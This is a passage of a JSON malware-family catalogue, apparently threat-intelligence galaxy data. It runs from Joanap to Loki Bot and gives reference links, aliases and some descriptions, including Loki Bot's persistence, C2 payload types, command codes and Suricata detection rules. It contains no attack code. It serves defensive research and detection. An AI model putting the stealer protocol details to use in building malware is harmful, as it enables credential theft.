"https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", "value": "Joanap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" ], "synonyms": [], "type": [] }, "uuid": 
"8201c8d2-1dab-4473-bbdf-42952b3d5fc6", "value": "Joao" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" ], "synonyms": [], "type": [] }, "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", "value": "Jolob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", "http://marcmaiffret.com/vault7/" ], "synonyms": [], "type": [] }, "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", "value": "JQJSNICKER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" ], "synonyms": [], "type": [] }, "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", "value": "JripBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", "value": "KAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", "value": "Karagany" }, { "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc. This malware has been on sale by an actor under the username Yattaze, starting in late April. 
The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" ], "synonyms": [], "type": [] }, "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", "value": "Kardon Loader" }, { "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", "https://research.checkpoint.com/banking-trojans-development/", "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" ], "synonyms": [], "type": [] }, "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", "value": "KasperAgent" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" ], "synonyms": [], "type": [] }, "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", "value": "Kazuar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" ], "synonyms": [], "type": [] }, "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", "value": "Kegotip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], "type": [] }, "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" ], "synonyms": [ "TSSL" ], "type": [] }, "uuid": "28c13455-7f95-40a5-9568-1e8732503507", "value": "KeyBoy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", "https://twitter.com/smoothimpact/status/773631684038107136", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [], "type": [] }, "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", "value": "APT3 
Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" ], "synonyms": [], "type": [] }, "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass", "https://securelist.com/keypass-ransomware/87412/" ], "synonyms": [], "type": [] }, "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", "value": "KeyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" ], "synonyms": [], "type": [] }, "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", "value": "KHRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", "value": "Kikothac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], "synonyms": [], "type": [] }, "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://www.youtube.com/watch?v=C-dEOt0GzSE", 
"https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" ], "synonyms": [ "Kasper Internet Non-Security", "Maple" ], "type": [] }, "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with an IP retriever module, an Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ "Joglog" ], "type": [] }, "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c", "value": "KleptoParasite Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.morphick.com/resources/news/klrd-keylogger" ], "synonyms": [], "type": [] }, "uuid": "70459959-5a20-482e-b714-2733f5ff310e", "value": "KLRD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://github.com/zerosum0x0/koadic" ], "synonyms": [], "type": [] }, "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", "value": "Koadic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", "https://twitter.com/struppigel/status/812726545173401600" ], "synonyms": [], "type": [] }, "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html" ], "synonyms": [], "type": [] }, "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", "value": "Konni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" ], "synonyms": [], "type": [] }, "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", "value": "KoobFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://camal.coseinc.com/publish/2013Bisonal.pdf", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf" ], "synonyms": [ "Bisonal" ], "type": [] }, "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", "value": "Korlia" }, { "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter became fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter were packed together\r\nJan 2018 - Cylance report on Persistence", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", 
"https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless" ], "synonyms": [], "type": [] }, "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", "value": "Kovter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" ], "synonyms": [], "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", "value": "KPOT Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://www.recordedfuture.com/kraken-cryptor-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657", "value": "Kraken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" ], "synonyms": [ "BlackMoon" ], "type": [] }, "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", "value": "KrBanker" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" ], "synonyms": [], "type": [] }, "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", "value": "KrDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" ], "synonyms": [ "Osiris" ], "type": [] }, "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", "value": "Kronos" }, { "description": "A keylogger used by Turla.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/" ], "synonyms": [], "type": [] }, "uuid": "aa93d030-abef-4215-bc9e-6c7483562d19", "value": "KSL0T" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" ], "synonyms": [ "Barys", "Gofot", "Kuaibpy" ], "type": [] }, "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", "value": "Kuaibu" }, { 
"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" ], "synonyms": [], "type": [] }, "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", "value": "Kuluoz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" ], "synonyms": [], "type": [] }, "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", "value": "Kwampirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", "http://adelmas.com/blog/longhorn.php", "https://www.youtube.com/watch?v=jeLd-gw2bWo", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", "value": "Lambert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" ], "synonyms": [], "type": [] }, "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", "value": "Lamdelin" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "http://malware-traffic-analysis.net/2017/04/25/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/" ], "synonyms": [], "type": [] }, "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", "value": "LatentBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", "https://twitter.com/PhysicalDrive0/status/828915536268492800", "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "Lazarus (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" ], "synonyms": [], "type": [] }, "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", "value": "Leash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", 
"https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html" ], "synonyms": [ "shoco" ], "type": [] }, "uuid": "41da41aa-0729-428a-8b82-636600f8e230", "value": "Leouncia" }, { "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], "type": [] }, "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" ], "synonyms": [], "type": [] }, "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", "value": "Limitail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", "value": "Listrix" }, { "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. 
\r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://github.com/zettabithf/LiteHTTP", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], "type": [] }, "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", "value": "Locky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" ], "synonyms": [], "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", "value": "Locky (Decryptor)" }, { "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" ], "synonyms": [], "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", "value": "Locky Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", 
"https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" ], "synonyms": [], "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", "value": "LockPOS" }, { "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" ], "synonyms": [ "Nymeria" ], "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", "value": "Loda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", "value": "Logedrut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" ], "synonyms": [], "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", "value": "LogPOS" }, { "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. 
This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", 